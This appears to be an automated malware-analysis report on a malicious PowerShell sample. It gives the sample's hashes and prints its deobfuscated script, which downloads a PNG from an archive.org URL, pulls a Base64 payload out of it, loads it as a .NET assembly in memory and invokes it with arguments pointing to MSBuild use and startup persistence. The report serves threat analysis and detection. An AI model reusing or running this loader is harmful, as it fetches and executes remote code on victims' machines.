Malicious

18f6a95197e9b5a5de1c6092459afde4

PowerShell | MD5: 18f6a95197e9b5a5de1c6092459afde4 | Size: 1.03 MB | application/x-powershell

Characteristics
MD5: 18f6a95197e9b5a5de1c6092459afde4
Sha1: f9b13daf77414133e425afd47c9108f55bd2d0e3
Sha256: 1d77f0c7f93f79c5884c8731ff55c8ebb23fdf112e927851abd8ef3b73d130d7
Sha384: bde1fe4f68366a32c788bf14b8d038b367274e26ac469684f89ea81e9999ad93007824598189c940eb4d695de4a02903
Sha512: 01c619bd4de72bf0e47c5b7ac1c975f02a9473e2a0e2c72ff9809e6ec229591598bedb58e0a31233c13a53acce0caca6d1d168811ee46ae6f15b312ae200b9f1
SSDeep: 12288:awt4c9W3mDO1GzTR2Fwt4c9W3mDO1GzTR2hwt4c9W3mDO1GzTR2m:Z4+W2KFy4+W2KFu4+W2KFm
TLSH: EB25CF5E352A457E6586B0BC22094162F08EC7E1C36EE3F2D460D868E095CBDD1BE7B7
File Structure
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Artefacts
Name
Value
Deobfuscated PowerShell

# Fetch the remote file and extract the Base64 text between the BaseStart- and -BaseEnd markers
$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd")
$valor = $matches[1]
# Decode the extracted text and load it as a .NET assembly in memory
$assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor))
# Encoded string passed as the first argument to the loaded method
$olinia = "mUDZmljYlVTO 0IjYiJTNxMDNhdTN1MjNkRDN3gDNiBTN0MmNzkDM4QGO0IzNwcDOidjZ5QmNzE2MkJ2MzAjZhZTP thmJzcTOhBTY4YTPzlmJzYWYmFTY4YTP4V2P0hHdukGcvN2LyIjMwMTOzAjM3QDO0AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa"
# Resolve ClassLibrary1.Home.VAI by reflection and invoke it
$type = $assembly."GetType"("ClassLibrary1.Home")
$method = $type."GetMethod"("VAI")
$method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Characteristics
No malware configuration was found at this point.